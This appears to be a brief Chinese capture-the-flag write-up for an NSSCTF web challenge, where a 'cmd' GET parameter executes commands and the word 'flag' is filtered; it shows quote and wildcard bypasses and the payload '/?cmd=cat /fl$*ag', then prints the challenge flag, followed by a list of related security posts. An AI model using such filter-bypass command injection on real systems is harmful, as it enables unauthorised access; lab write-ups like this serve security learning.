开启靶场,打开链接:
GET传参cmd,且对flag字符串进行了过滤
用\*绕过,fl*ag
用'绕过,f''lag或f'l'ag
当然还有别的方法绕过,就不一一赘述了(已经写了文档了《过滤绕过方法》)
/?cmd=cat /fl$*ag
成功得到flag:
NSSCTF{132e1f48-9cc3-4a6f-8608-91f32a8fa6f6}
相关推荐
m0_747266094 小时前
代码审计与web安全选择题1编程到天明9 小时前
CTF-Web题解:“require_once(‘flag.php‘); &assert(“$i == $u“);”Johny_Zhao9 小时前
CentOS Stream 9上部署FTP应用服务的两种方法(传统安装和docker-compose)还是奇怪10 小时前
深入解析三大Web安全威胁:文件上传漏洞、SQL注入漏洞与WebShell大白玉米19 小时前
短视第三套多功能主题3.0二开模板苹果CMS插件重构版终焉暴龙王1 天前
CTFHub web进阶 php Bypass disable_function通关攻略百川1 天前
Apache文件解析漏洞小鼻崽纸2 天前
cacti漏洞CVE-2022-46169的复现希望奇迹很安静2 天前
SSRF_XXE_RCE_反序列化学习程序员编程指南2 天前
Qt 网络编程进阶:网络安全与加密